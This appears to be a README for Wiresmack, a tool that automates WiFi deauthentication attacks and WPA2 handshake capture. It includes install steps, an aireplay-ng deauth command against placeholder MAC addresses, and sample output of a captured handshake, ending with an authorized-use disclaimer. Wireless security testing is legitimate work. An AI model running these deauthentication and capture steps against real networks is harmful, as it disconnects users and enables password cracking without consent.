Wiresmack is a tool designed for wireless network monitoring and attack automation using Airodump-ng and related utilities.
Wiresmack streamlines wireless security assessments by automating data collection, deauthentication attacks, and handshake captures. It integrates multiprocessing, subprocess management, and custom scripting for efficient execution.
Developed and Tested on:
Kali Linux (`latest`)
Installation:
sudo apt install cowpattygit clone https://github.com/jesserubio/wiresmack.git
cd wiresmack
pip install -r requirements.txtDocker Installation:
git clone https://github.com/jesserubio/wiresmack.git
cd wiresmack
docker build -t wiresmack .
docker run -it --rm --privileged --network=host -v "$(pwd)":/opt/wiresmack wiresmackUsage:
Usage Examples:
python wiresmack.py -i wlan0 -p5
Interface Arguments:
-i Set interface <wlan0>
Aireplay-ng Arguments:
-p Set number of deauthentication packets <5>
Global Arguments:
--debug Set logging level [DEBUG]Run Wiresmack, select target ESSID and capture the Four-way Handshake!
╭─────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ │
| __ __.__ __ |
| / \ / \__|______ ____ ______ _____ _____ ____ | | __ |
| \ \/\/ / \_ __ \_/ __ \ / ___// \\__ \ _/ ___\| |/ / |
| \ /| || | \/\ ___/ \___ \| Y Y \/ __ \\ \___| < |
| \__/\ / |__||__| \___ >____ >__|_| (____ /\___ >__|_ \ |
| \/ \/ \/ \/ \/ \/ \/ │
│ │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Target ────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ BSSID: BB:BB:BB:BB:BB:BB │
│ Channel: 7 │
│ Encryption: WPA2 │
│ SSID: Contoso │
│ Client(s): CC:CC:CC:CC:CC:CC │
│ │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Aireplay-ng ───────────────────────────────────────────────────────────────────────────────────────────────╮
│ │
│ aireplay-ng -0 5 -a BB:BB:BB:BB:BB:BB -c CC:CC:CC:CC:CC:CC --ignore-negative-one wlan0 │
│ │
╰─────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
17:00:01 Waiting for beacon frame (BSSID: BB:BB:BB:BB:BB:BB) on channel 7
17:00:02 Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 1|34 ACKs]
17:00:03 Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [17|64 ACKs]
17:00:04 Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 1|61 ACKs]
17:00:05 Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 6|128 ACKs]
17:00:06 Sending 64 directed DeAuth (code 7). STMAC: [CC:CC:CC:CC:CC:CC] [ 2|121 ACKs]
[✔] Captured a Four-way Handshake!
[✔] Four-way Handshake is most likely for: BB:BB:BB:BB:BB:BB, Contoso
Capture file moved to: results/Contoso_April-20-2025_17:00:07.cap
Press <ENTER> to exitThis project is intended for educational and security research purposes only. Unauthorized use of network monitoring tools may violate laws and regulations. The developers assume no responsibility for misuse. Always ensure you have explicit permission before testing on any network.